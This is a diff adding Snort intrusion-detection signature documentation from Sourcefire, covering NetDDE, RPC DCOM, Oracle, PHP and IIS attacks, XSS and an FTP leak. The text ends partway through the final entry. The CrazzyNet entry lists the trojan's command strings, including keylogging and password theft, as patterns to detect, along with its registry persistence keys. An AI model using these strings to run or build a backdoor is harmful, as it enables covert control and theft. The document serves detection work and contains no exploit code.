+++ b/doc/signatures/3460.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+3460
+
+--
+Summary:
+This event is generated when a numeric argument to the REST command is
+detected.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is generated
+when a numeric argument to the REST command is detected.
+
+If a numeric argument is supplied to the REST command on an affected
+HP-UX system, it may be possible for an attacker to discover the
+contents of a particular memory location identified by the argument.
+This may in turn lead to the disclosure of sensitive information on the
+host.
+
+--
+Affected Systems:
+	HP-UX 11.0 utilizing HP-UX ftpd 1.1.214 .4
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple. Exploit code is not needed but code does exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2958.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2958
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1447.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1447
+
+--
+Summary:
+This event is generated when a malicious packet is sent to the Microsoft Terminal Server port.
+
+--
+Impact:
+Denial of service.  Sending repeated packets may cause a denial of service by consuming all available memory resources.
+
+--
+Detailed Information:
+A flaw exists in the Microsoft Terminal Server port on certain versions of Windows that may cause a denial of service of the vulnerable host by consuming all available memory resources.  This attack requires multiple malicious packets to cause a denial of service.
+
+--
+Affected Systems:
+Microsoft Windows 2000 Advanced Server SP2
+Microsoft Windows 2000 Advanced Server SP1
+Microsoft Windows 2000 Advanced Server
+Microsoft Windows 2000 Datacenter Server SP2
+Microsoft Windows 2000 Datacenter Server SP1
+Microsoft Windows 2000 Datacenter Server
+Microsoft Windows 2000 Server SP2
+Microsoft Windows 2000 Server SP1
+Microsoft Windows 2000 Server
+Microsoft Windows NT Terminal Server 4.0
+
+--
+Attack Scenarios:
+An attacker may attempt to cause a denial of service against a vulnerable server by sending repeated malicious packets.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patches discussed in Microsoft Security Bulletin MS01-040.
+Block access to the Microsoft Terminal Server port from outside the network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0540
+
+--
--- /dev/null
+++ b/doc/signatures/100000719.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000719
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "index.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2947.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1085.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1085
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1152.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1152
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1881.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1881
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/909.txt
@@ -0,0 +1,62 @@
+SID:
+909
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2765.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2765
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2735.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2735
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3242.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3242
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3212.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3212
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3321.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3321
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3064.txt
@@ -0,0 +1,158 @@
+Rule: 
+
+--
+Sid: 
+3064
+
+-- 
+Summary: 
+This event is generated when an attempt is made by the victim to send a
+connection confirmation to the attacker using the CrazzyNet trojan.
+
+-- 
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions
+resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+CrazzyNet uses port 17499. CrazzyNet has a number of functions. Each function is
+associated with an attack signal string
+that is sent to the victim. Be suspicious of the following strings:
+
+Format: Function Name - String To Look For
+
+Add Line To File - addlin
+Overwrite File With Added Line - ovwlin
+Add Icon To Desktop - addico
+Beep Sound - sndbep
+Change Windows Control Text - chgawc
+Change Resolution - chgres
+Chat - chatwy
+Get Clipboard Text - clpget
+Crazy Mouse On - crazym;1
+Crazy Mouse Off - crazym;0
+Delete File/Directory - delete
+Remove Windows Functions - remwma;0
+Download File - getfil
+Disable Ctl-Alt-Del - discad;0
+Enable Ctl-Alt-Del - discad;1
+Disable Windows Startup - wndsas;0
+Enable Windows Startup - wndsas;1
+Find Files - findfi
+Format - format
+Get Colors - getcol
+Get Computer Name - getcon
+Set Computer Name - setcon
+Get Date - gettad
+Set Date - settad
+Get Internet Explorer Start Page - geties
+Set Internet Explorer Start Page - chgies
+Get Mouse Position - getpos
+Set Mouse Position - setmse
+Get Clients Connected - geticc
+Get Computer Information - getinf
+Hide Picture - hidpic
+List Installed Programs - asplst
+Keylogger - keylog;1
+Kill Mouse - kilmse
+List Files And Directories - nextdr
+List ICQ - icqlst
+List Of Apps - lstapp
+Make Directory - makdir
+Monitor On - onmoni
+Monitor Off - ofmoni
+Get Mouse Double Click Time - getdcl
+Set Mouse Double Click Time - setdcl
+Open CD - opencd
+Close CD - closcd
+Ping - *ICMP Packet* Echo this string of data
+Play Sound - playsd
+Print Text - printt
+Refresh File Listing - refdir
+Run File - runfil
+Screen Dump - screen
+Get Screensaver - getfon
+Set Screensaver - setscr
+Enable Scrolling Text - scroll
+Disable Scrolling Text - sscrol
+Send To URL - senurl
+Send Key - runkey
+Send Message - msgbox
+Set Clipboard Text - clpset
+Set Desktop Image - chgdes
+Show Clock - sclock;1
+Hide Clock - sclock;0
+Show Desktop Icons - deskic;1
+Hide Desktop Icons - deskic;0
+Show Start Bar - startb;1
+Hide Start Bar - startb;0
+Show Task Bar - sotask
+Hide Task Bar - hitask
+Show Task Bar Icons - staskb;1
+Hide Task Bar Icons - staskb;0
+Show Picture - shopic
+Start CD loop - cdloop;1
+Stop CD loop - cdloop;0
+Steal Passwords - geticp
+Swap Mouse Buttons On - swpmse;1
+Swap Mouse Buttons Off - swpmse;0
+Terminate Application - terapp
+Get Text Box Cursor Blink Rate - getret
+Set Text Box Cursor Blink Rate - setret
+Upload File - uplfil
+Change Volume - volume
+Warp On - warpon
+Warp Off - warpof
+List Windows - wndlst
+
+-
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because
+they often can be backdoors in disguise. 
+Once the victim has unknowingly installed the server, the attacker will usually
+employ an IP scanner tool to find vulnerable 
+systems. Once an IP is found, the attacker simply has to make the connection.
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has
+installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action:
+CrazzyNet copies itself to C:\WINDOWS\Registry32.exe
+Delete the registry key Reg32=Registry32.exe found in
+HKCUU\Software\Microsoft\Windows\CurrentVersion\Run 
+Delete Registry32.exe from Win.ini and System.ini
+If found, delete Registry32.exe and server.exe
+Make sure to keep your virus definitions updated on your anti-virus software.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+Pestpatrol:
+http://www.pestpatrol.com/PestInfo/C/CrazzyNet.asp
+
+--
--- /dev/null
+++ b/doc/signatures/879.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+879
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1009.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1009
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3279.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3279
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2326.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2326
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted against the SGDynamo web application.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+a web site. Attackers can potentially gain access to a users' cookies 
+or session identification credentials, allowing the attacker to
+impersonate the user.
+
+--
+Detailed Information:
+The SGDynamo web application does not correctly filter script code in
+URL supplied parameters. It is possible for an attacker to place code of
+their choosing in a link supplied to the application. The code is then
+executed in the browser of a user who clicks on the link.
+
+The error occurs in checking the parameters supplied via the HTNAME
+parameter in the application.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Affected Systems:
+	Ecometry SGDynamo 5.32 U
+	Ecometry SGDynamo 5.32 T
+	Ecometry SGDynamo 6.1
+	Ecometry SGDynamo 7.0
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/472.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+472
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for Host datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
